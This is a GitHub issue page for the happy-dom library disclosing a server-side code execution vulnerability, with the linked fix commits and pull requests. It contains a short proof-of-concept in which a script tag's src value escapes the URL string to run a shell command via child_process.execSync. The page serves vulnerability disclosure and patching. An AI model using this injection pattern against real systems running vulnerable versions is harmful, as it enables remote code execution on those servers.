Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Security vulnerability that allows for scripts to execute on the server #1585

Closed
capricorn86 opened this issue Nov 5, 2024 · 0 comments · Fixed by #1586 or #1588
Closed

Security vulnerability that allows for scripts to execute on the server #1585

capricorn86 opened this issue Nov 5, 2024 · 0 comments · Fixed by #1586 or #1588
Assignees
@capricorn86
Labels
bug Something isn't working high priority

Comments

@capricorn86
Copy link
Owner

capricorn86 commented Nov 5, 2024
edited
Loading

Thank you @kevin-mizu for finding this vulnerability!

This code snippet shows how it is possible to inject a server-side script into the "src" of a <script> tag. As Happy DOM uses child_process.execFileSync() in order to perform the fetch synchronous, the script could be injected by escaping from the URL string.

const { Window } = require("happy-dom");

const window = new Window();
const document = window.document;
    
document.write(`<script src="https://localhost:8080/'+require('child_process').execSync('id')+'"></script>`);
@capricorn86 capricorn86 added the bug Something isn't working label Nov 5, 2024
@capricorn86 capricorn86 self-assigned this Nov 5, 2024
capricorn86 added a commit that referenced this issue Nov 6, 2024
@capricorn86
fix: [#1585] Fixes security vulnerability that allowed for server sid…
e080ece 
…e code to be executed by a <script> tag
@capricorn86 capricorn86 linked a pull request Nov 6, 2024 that will close this issue
fix: [#1585] Fixes security vulnerability that allowed for server side code to be executed by a <script> tag #1586
Merged
capricorn86 added a commit that referenced this issue Nov 6, 2024
@capricorn86
chore: [#1585] Fixes unit test
4360a49
capricorn86 added a commit that referenced this issue Nov 6, 2024
@capricorn86
fix: [#1585] Fixes security vulnerability that allowed for server sid…
5ee0b16 
…e code to be executed by a <script> tag (#1586)

* fix: [#1585] Fixes security vulnerability that allowed for server side code to be executed by a <script> tag

* chore: [#1585] Fixes unit test
capricorn86 added a commit that referenced this issue Nov 6, 2024
@capricorn86
fix: [#1585] Fixes a security vulnerability that allowed for server s…
83616f9 
…ide code to be executed by a <script> tag
@capricorn86 capricorn86 linked a pull request Nov 6, 2024 that will close this issue
fix: [#1585] Fixes a security vulnerability that allowed for server side code to be executed by a <script> tag #1588
Merged
capricorn86 added a commit that referenced this issue Nov 6, 2024
@capricorn86
fix: [#1585] Fixes a security vulnerability that allowed for server s…
d23834c 
…ide code to be executed by a <script> tag (#1588)
sparksam added a commit to safeinsights/trusted-output-app that referenced this issue Nov 7, 2024
@sparksam
Update "happy-dom" version due to capricorn86/happy-dom#1585
eba4b36
@oliviertassinari oliviertassinari mentioned this issue Nov 13, 2024
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@capricorn86 capricorn86

Labels
bug Something isn't working high priority
Projects
None yet
Milestone
No milestone
1 participant
@capricorn86